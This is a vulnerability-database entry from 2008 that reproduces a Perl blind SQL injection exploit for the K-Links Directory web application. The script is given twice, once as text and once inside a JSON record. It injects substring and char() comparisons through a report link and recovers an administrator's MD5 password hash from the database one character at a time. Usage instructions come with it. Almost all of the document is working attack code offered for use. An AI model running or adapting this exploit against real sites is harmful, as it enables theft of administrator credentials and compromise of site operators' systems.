Search...

K-Links Directory Blind SQL Injection Exploit

2008-08-12T00:00:00

ID SECURITYVULNS:DOC:20326
Type securityvulns
Reporter Securityvulns
Modified 2008-08-12T00:00:00

Description

!/usr/bin/perl

K-Links Directory Blind SQL Injection Exploit

..::virangar security team::..

www.virangar.net

C0d3d BY:virangar security team ( hadihadi )

special tnx to:

MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra

& all virangar members & all hackerz

my lovely friends hadi_aryaie2004 & arash(imm02tal)

..:::Young Iranina Hackerz::..

use HTTP::Request; use LWP::UserAgent;

if (@ARGV != 2){ header(); }

$host = $ARGV[0]; $mod=$ARGV[1]; if($mod==1){ $tbl="tbl_admin"; $col="upass"; } elsif($mod==2){ $tbl="platinum_admins"; $col="a_apss"; } else{ print "\nyour option not true\n"; exit; }

print "\n md5 Password:\r\n"; &halghe(); print "\n[+]Done\n";

sub halghe { for($i = 1; $i <= 32; $i++){ $f = 0; $n = 48; while(!$f && $n <= 57) { if(&inject($host ,$tbl ,$col ,$i, $n,)){ $f = 1; syswrite(STDOUT, chr($n), 1); } $n++; } if(!$f){ $n=97; while(!$f && $n <= 102) { if(&inject($host ,$tbl ,$col ,$i, $n,)){ $f = 1; syswrite(STDOUT, chr($n), 1); } $n++; }} } } sub inject { my $site = $[0]; my $tl = $[1]; my $cl = $[2]; my $a = $[3]; my $b = $_[4];

$attack= "$site"."%20and%20substring((select%20"."$cl"."%20from%20$tl%20limit%200,1),"."$a".",1)=char("."$b".")/*";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $req = $b->request(HTTP::Request->new(GET=>$attack)); $res = $req->content;

if ($res !~ m/You have an error in your SQL syntax;/i and $res !~ m/Table.*doesn't exist/i ){ return 1; }

} sub header { print qq{

K-Links Directory Blind SQL Injection Exploit

www.virangar.net

Useage: perl $0 Host option

option: 1 [table=tbl_admin & column=upass]

2 [table=platinum_admins & column=a_pass]

Host: full patch to Report Link+id (dont forget http://)

Example:

perl $0 http://site.com/report/1 2

}; }

JSON Vulners Source

Initial Source

{"id": "SECURITYVULNS:DOC:20326", "bulletinFamily": "software", "title": "K-Links Directory Blind SQL Injection Exploit", "description": "#!/usr/bin/perl \r\n###########################################################################\r\n# K-Links Directory Blind SQL Injection Exploit #\r\n# ..::virangar security team::.. #\r\n# www.virangar.net #\r\n# C0d3d BY:virangar security team ( hadihadi ) #\r\n#special tnx to: #\r\n#MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra #\r\n#& all virangar members & all hackerz #\r\n# my lovely friends hadi_aryaie2004 & arash(imm02tal) #\r\n# ..:::Young Iranina Hackerz::.. #\r\n###########################################################################\r\n\r\n\r\nuse HTTP::Request;\r\nuse LWP::UserAgent;\r\n\r\nif (@ARGV != 2){\r\nheader();\r\n}\r\n\r\n$host = $ARGV[0];\r\n$mod=$ARGV[1];\r\nif($mod==1){\r\n$tbl="tbl_admin";\r\n$col="upass";\r\n}\r\nelsif($mod==2){\r\n$tbl="platinum_admins";\r\n$col="a_apss";\r\n}\r\nelse{\r\nprint "\nyour option not true\n";\r\nexit;\r\n}\r\n\r\nprint "\n md5 Password:\r\n";\r\n&halghe();\r\nprint "\n[+]Done\n";\r\n\r\n\r\nsub halghe {\r\nfor($i = 1; $i <= 32; $i++){\r\n $f = 0;\r\n $n = 48;\r\n while(!$f && $n <= 57)\r\n {\r\n if(&inject($host ,$tbl ,$col ,$i, $n,)){\r\n $f = 1;\r\n syswrite(STDOUT, chr($n), 1);\r\n }\r\n$n++;\r\n}\r\nif(!$f){ \r\n$n=97;\r\nwhile(!$f && $n <= 102)\r\n {\r\n if(&inject($host ,$tbl ,$col ,$i, $n,)){\r\n $f = 1;\r\n syswrite(STDOUT, chr($n), 1);\r\n }\r\n$n++;\r\n}}\r\n}\r\n}\r\nsub inject {\r\nmy $site = $_[0];\r\nmy $tl = $_[1];\r\nmy $cl = $_[2];\r\nmy $a = $_[3];\r\nmy $b = $_[4];\r\n\r\n\r\n$attack= "$site"."%20and%20substring((select%20"."$cl"."%20from%20$tl%20limit%200,1),"."$a".",1)=char("."$b".")/*";\r\n\r\n$b = LWP::UserAgent->new() or die "Could not initialize browser\n";\r\n$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');\r\n$req = $b->request(HTTP::Request->new(GET=>$attack));\r\n$res = $req->content;\r\n\r\nif ($res !~ m/You have an error in your SQL syntax;/i and $res !~ m/Table.*doesn't exist/i ){\r\n return 1;\r\n}\r\n\r\n}\r\nsub header {\r\nprint qq{\r\n###################################################################\r\n# K-Links Directory Blind SQL Injection Exploit #\r\n# www.virangar.net #\r\n# Useage: perl $0 Host option #\r\n# option: 1 [table=tbl_admin & column=upass] #\r\n# 2 [table=platinum_admins & column=a_pass] #\r\n# #\r\n# Host: full patch to Report Link+id (dont forget http://) #\r\n# #\r\n# Example: #\r\n# perl $0 http://site.com/report/1 2 #\r\n# #\r\n###################################################################\r\n};\r\n}", "published": "2008-08-12T00:00:00", "modified": "2008-08-12T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20326", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:27", "edition": 1, "viewCount": 8, "enchantments": {"score": {"value": 1.6, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9211"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9211"]}]}, "exploitation": null, "vulnersScore": 1.6}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645297354}}